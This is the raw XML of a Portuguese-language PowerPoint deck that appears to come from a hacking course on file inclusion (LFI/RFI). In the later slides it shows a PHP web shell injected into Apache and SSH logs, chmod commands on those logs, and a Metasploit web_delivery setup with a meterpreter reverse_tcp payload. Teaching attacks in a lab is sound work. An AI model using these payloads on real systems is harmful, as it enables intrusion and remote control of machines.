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8" r:id="rId6"/>
  </p:sldMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="268" r:id="rId7"/>
    <p:sldId id="269" r:id="rId8"/>
    <p:sldId id="257" r:id="rId9"/>
    <p:sldId id="258" r:id="rId10"/>
    <p:sldId id="259" r:id="rId11"/>
    <p:sldId id="260" r:id="rId12"/>
    <p:sldId id="261" r:id="rId13"/>
    <p:sldId id="262" r:id="rId14"/>
    <p:sldId id="270" r:id="rId15"/>
    <p:sldId id="264" r:id="rId16"/>
    <p:sldId id="265" r:id="rId17"/>
    <p:sldId id="266" r:id="rId18"/>
    <p:sldId id="26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A3659C-148E-459F-A36D-E78E1EA48B6C}" v="45" dt="2020-11-24T13:17:01.033"/>
    <p1510:client id="{3DC41EEA-ED11-4A1A-86FF-00884AEEB342}" v="11" dt="2020-11-24T10:10:18.541"/>
    <p1510:client id="{412F6C56-4358-496A-BA6D-6F3E8D28D561}" v="9" dt="2020-11-24T09:39:34.638"/>
    <p1510:client id="{64E7EE28-6CEE-490B-B462-FB813BACA10B}" v="15" dt="2020-11-23T15:36:42.708"/>
    <p1510:client id="{962508BF-0E8E-4D56-8AA4-6A015A345809}" v="68" dt="2020-11-24T10:20:19.253"/>
    <p1510:client id="{AFA55B1E-F68A-41DB-AE04-652E55658133}" v="6" dt="2020-11-24T12:49:50.778"/>
    <p1510:client id="{B3A3567F-7527-40B0-B029-54F7A4F73949}" v="13" dt="2020-11-23T17:06:52.02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67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li Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{64E7EE28-6CEE-490B-B462-FB813BACA10B}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{64E7EE28-6CEE-490B-B462-FB813BACA10B}" dt="2020-11-23T15:36:40.083" v="13" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{64E7EE28-6CEE-490B-B462-FB813BACA10B}" dt="2020-11-23T15:36:40.083" v="12" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1334808620" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{64E7EE28-6CEE-490B-B462-FB813BACA10B}" dt="2020-11-23T15:36:40.083" v="12" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334808620" sldId="260"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{25A3659C-148E-459F-A36D-E78E1EA48B6C}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{25A3659C-148E-459F-A36D-E78E1EA48B6C}" dt="2020-11-24T13:17:01.033" v="44" actId="1076"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp new">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{25A3659C-148E-459F-A36D-E78E1EA48B6C}" dt="2020-11-24T13:17:01.033" v="44" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1501540436" sldId="270"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{25A3659C-148E-459F-A36D-E78E1EA48B6C}" dt="2020-11-24T13:17:01.033" v="44" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1501540436" sldId="270"/>
            <ac:spMk id="2" creationId="{342B17F1-CA23-4222-9218-11F67D98EC5B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{412F6C56-4358-496A-BA6D-6F3E8D28D561}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{412F6C56-4358-496A-BA6D-6F3E8D28D561}" dt="2020-11-24T09:39:34.622" v="8" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{412F6C56-4358-496A-BA6D-6F3E8D28D561}" dt="2020-11-24T09:39:34.622" v="7" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1684176436" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{412F6C56-4358-496A-BA6D-6F3E8D28D561}" dt="2020-11-24T09:39:34.622" v="7" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684176436" sldId="261"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{3DC41EEA-ED11-4A1A-86FF-00884AEEB342}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{3DC41EEA-ED11-4A1A-86FF-00884AEEB342}" dt="2020-11-24T10:10:18.541" v="9" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{3DC41EEA-ED11-4A1A-86FF-00884AEEB342}" dt="2020-11-24T10:10:17.338" v="8"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1684176436" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{3DC41EEA-ED11-4A1A-86FF-00884AEEB342}" dt="2020-11-24T10:10:17.338" v="8"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684176436" sldId="261"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{AFA55B1E-F68A-41DB-AE04-652E55658133}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{AFA55B1E-F68A-41DB-AE04-652E55658133}" dt="2020-11-24T12:49:50.778" v="5" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{AFA55B1E-F68A-41DB-AE04-652E55658133}" dt="2020-11-24T12:49:50.778" v="4" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="620159061" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{AFA55B1E-F68A-41DB-AE04-652E55658133}" dt="2020-11-24T12:49:50.778" v="4" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="620159061" sldId="262"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}" dt="2020-11-24T10:20:19.253" v="66"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}" dt="2020-11-24T10:20:19.253" v="66"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1684176436" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}" dt="2020-11-24T10:20:04.409" v="61"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684176436" sldId="261"/>
            <ac:spMk id="3" creationId="{CA354DA9-29F2-4484-AB57-ECF01C8B614F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}" dt="2020-11-24T10:20:19.253" v="66"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684176436" sldId="261"/>
            <ac:spMk id="4" creationId="{C1668AD8-8667-4DC7-B7B3-238590905395}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}" dt="2020-11-24T10:20:08.143" v="62" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684176436" sldId="261"/>
            <ac:spMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{962508BF-0E8E-4D56-8AA4-6A015A345809}" dt="2020-11-24T10:20:16.097" v="64" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1684176436" sldId="261"/>
            <ac:spMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{B3A3567F-7527-40B0-B029-54F7A4F73949}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{B3A3567F-7527-40B0-B029-54F7A4F73949}" dt="2020-11-23T17:06:52.025" v="12" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp delSp modSp">
        <pc:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{B3A3567F-7527-40B0-B029-54F7A4F73949}" dt="2020-11-23T17:06:50.353" v="10" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1334808620" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{B3A3567F-7527-40B0-B029-54F7A4F73949}" dt="2020-11-23T17:06:50.353" v="10" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334808620" sldId="260"/>
            <ac:spMk id="3" creationId="{38C0EFED-925F-445B-BB74-7BCC0257D6B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Luli Rosenberg" userId="S::luli.rosenberg_gmail.com#ext#@itsafebrazil.onmicrosoft.com::6b7c18c4-c61f-40ec-a1f2-252a46c3fb68" providerId="AD" clId="Web-{B3A3567F-7527-40B0-B029-54F7A4F73949}" dt="2020-11-23T17:06:42.696" v="8"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1334808620" sldId="260"/>
            <ac:spMk id="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free-powerpoint-templates-design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71783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19640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981108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1306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BR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333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extBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2404412" y="4512734"/>
            <a:ext cx="6858000" cy="135421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Curso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de Hacking para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Infraestruturas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e </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US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redes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Shay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Alfasi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Tradu</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR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ção: Luli Rosenberg &amp; Helton Wernik</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="he-IL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38768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94573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80933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2913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751009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350396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35099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פריסה מותאמת אישי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429654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403655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814088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1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370284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091215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6"/>
            <a:ext cx="2628900" cy="58118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6"/>
            <a:ext cx="7734300" cy="58118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485925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976" y="0"/>
            <a:ext cx="12197952" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:hlinkClick r:id="rId3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קורס פייתון בהייטק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5" name="TextBox 4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Roman Zaikin</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="213022467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12192000" cy="1179288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr"/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr sz="5333" b="1" u="sng" baseline="0">
                <a:latin typeface="Ariel"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" b="0" u="none" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>Click to edit title</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" alt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 hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="1536701"/>
            <a:ext cx="10972800" cy="452596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</a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="3733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</p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="229372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5105134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980137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44438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2725652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9738943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88636135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50909699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6772208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9983130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6149791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9836263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81335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369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36148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7938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85792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151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3918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hyperlink" Target="http://www.free-powerpoint-templates-design.com/free-powerpoint-templates-design" TargetMode="Externa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E56DE4-9743-457A-9119-581283221591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5EF085-42B5-4935-999D-1DE731459A1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8180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24ABF69-6E84-4DDE-9FC7-873BECAFC963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11/24/2020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DD7A2C-91F1-4004-A171-7F4AB5FF3A1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377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rgbClr val="09091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>
            <a:hlinkClick r:id="rId15"/>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="6560147"/>
            <a:ext cx="7639475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H</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR" altLang="ko-K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itchFamily="34" charset="0"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>acking de Infraestruturas - ITSafe Brasil</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="ko-KR" alt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6332824" y="6560147"/>
            <a:ext cx="5859177" cy="2974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3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S</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="pt-BR" sz="1333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Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>hay Alfasi</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1333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637" y="5405415"/>
            <a:ext cx="1854364" cy="1102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5865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64109D-B2E0-4B99-B824-F6D183490778}" type="datetimeFigureOut">
              <a:rPr lang="he-IL" smtClean="0"/>
              <a:t>ח'/כסלו/תשפ"א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75B696-2B4F-48AA-B475-BCE60AE26DC3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7180838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5561923"/>
            <a:ext cx="12192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1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itchFamily="34" charset="0"/>
              <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="34" charset="-127"/>
              <a:cs typeface="Arial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2880" y="1"/>
            <a:ext cx="2219120" cy="1319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133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10006013" cy="635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Exploits And Metasploit – File Inclusion</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>LFI &amp; RFI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Calibri Light (Headings)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423" y="2034726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Uma parte avançada de scripts de todas as linguagens do lado do servidor na web.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42689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O que é inclusão de arquivo (File Inclusion)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6423" y="2383720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Necessário para manter o código dos aplicativos da web organizado e sustentável.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26423" y="2735634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Permite que aplicativos da web leiam arquivos do sistema de arquivos.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155" y="3324359"/>
            <a:ext cx="6429375" cy="523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5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-1" y="479425"/>
            <a:ext cx="11715185" cy="6350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Exploits And Metasploit – Local File Inclusions [LFI] (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Inclus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="2800" dirty="0"/>
              <a:t>ão local de arquivos)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Calibri Light (Headings)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423" y="2043435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Normalmente o caminho do arquivo que você deseja abrir é enviado para uma função que retorna o conteúdo do arquivo como uma string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4491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LFI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78" y="4112320"/>
            <a:ext cx="6429375" cy="523875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26423" y="2741687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Quando o desenvolvedor falha em implementar filtragem suficiente, um invasor pode explorar a inclusão de arquivo local.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26423" y="3439939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t-BR" dirty="0"/>
              <a:t>substituindo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" b="1" dirty="0"/>
              <a:t>contact.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0"/>
              <a:t> pelo caminho de um arquivo confidencial, como o arquivo passwd.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1954" y="4717648"/>
            <a:ext cx="6448425" cy="514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8386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10006013" cy="635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Exploits And Metasploit – LFI - Log Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Calibri Light (Headings)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423" y="2052144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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 775 -R /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/log/apache2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36869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Defina as permissões para access.log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6423" y="2853903"/>
            <a:ext cx="3369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Parâmetro de injeção no sistema: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6423" y="3286330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> system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']); ?&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3578793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10006013" cy="635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Exploits And Metasploit – LFI - Log Injection (SSH)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Calibri Light (Headings)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6423" y="2052144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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 775 /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/log/auth.log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3523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Defina as permissões para auth.log</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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226423" y="2853903"/>
            <a:ext cx="33699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b="1" dirty="0"/>
              <a:t>Parâmetro de injeção no sistema:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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6423" y="3286330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ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> '&lt;?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> system($_GET['</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>']); ?&gt;'@192.168.1.X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423" y="4025206"/>
            <a:ext cx="344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Envio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> do payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>pelo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>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3" y="4394750"/>
            <a:ext cx="11059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exploit/multi/script/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt;set target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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>reverse_tcp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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 192.168.1.X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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt;set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>srvport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 80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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>web_delivery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)&gt;exploit -j</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2598640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Exploits e Metasploit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
